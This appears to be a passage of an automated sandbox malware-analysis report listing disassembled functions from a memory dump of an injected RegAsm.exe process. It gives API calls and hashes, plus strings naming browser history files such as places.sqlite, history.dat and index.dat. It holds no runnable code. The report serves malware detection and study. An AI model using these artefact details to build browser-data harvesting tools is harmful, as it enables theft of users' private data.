                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                • String ID:
                                                                • API String ID: 2722907921-0
                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                APIs
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                • memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                • String ID: history.dat$places.sqlite
                                                                • API String ID: 3093078384-467022611
                                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                APIs
                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$File$PointerRead
                                                                • String ID:
                                                                • API String ID: 839530781-0
                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID: *.*$index.dat
                                                                • API String ID: 1974802433-2863569691
                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@mallocmemcpy
                                                                • String ID:
                                                                • API String ID: 3831604043-0
                                                                • Opcode ID: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                • Opcode Fuzzy Hash: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                APIs
                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$FilePointer
                                                                • String ID:
                                                                • API String ID: 1156039329-0
                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                • String ID:
                                                                • API String ID: 1125800050-0
                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleSleep
                                                                • String ID: }A
                                                                • API String ID: 252777609-2138825249
                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                • Opcode Fuzzy Hash: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: BINARY
                                                                • API String ID: 2221118986-907554435
                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                • _mbscpy.MSVCRT ref: 00405250
                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 568699880-0
                                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /stext
                                                                • API String ID: 2081463915-3817206916
                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 1023896661-0
                                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 2445788494-0
                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                APIs
                                                                Strings
                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID: failed to allocate %u bytes of memory
                                                                • API String ID: 2803490479-1168259600
                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmpmemset
                                                                • String ID:
                                                                • API String ID: 1065087418-0
                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                APIs
                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                • String ID:
                                                                • API String ID: 1381354015-0
                                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                APIs
                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                • String ID:
                                                                • API String ID: 2154303073-0
                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                APIs
                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$PointerRead
                                                                • String ID:
                                                                • API String ID: 3154509469-0
                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                APIs
                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                • String ID:
                                                                • API String ID: 4232544981-0
                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                APIs
                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName
                                                                • String ID:
                                                                • API String ID: 514040917-0
                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                APIs
                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                APIs
                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
